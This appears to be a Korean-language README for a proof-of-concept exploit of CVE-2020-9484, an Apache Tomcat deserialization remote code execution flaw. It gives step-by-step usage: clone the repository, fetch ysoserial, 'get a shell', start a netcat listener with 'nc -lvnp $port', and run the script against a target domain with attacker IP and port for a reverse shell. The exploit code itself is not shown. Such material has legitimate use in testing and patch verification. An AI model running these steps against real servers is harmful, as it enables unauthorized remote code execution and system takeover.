
CVE-2020-9484에 대한 PoC
CVE-2020-9484를 위한 POC
역직렬화를 통한 Apache Tomcat RCE (CVE-2020-9484)
문서 살펴보기 »
1. 이 저장소를 클론하면 CVE-2020-9484를 사용할 수 있으며 필요에 따라 소스 코드를 수정할 수 있습니다.
2. ysoserial jar를 다운로드하세요.
3. CVE-2020-9484와 ysoserial.jar를 같은 디렉토리에 배치하세요.
4. 셸을 획득하세요!
CVE-2020-9484의 사용을 간소화하기 위해 간단한 bash 스크립트가 작성되었습니다.
공격 시에는 netcat 리스너가 준비되어 있어야 합니다.
nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port
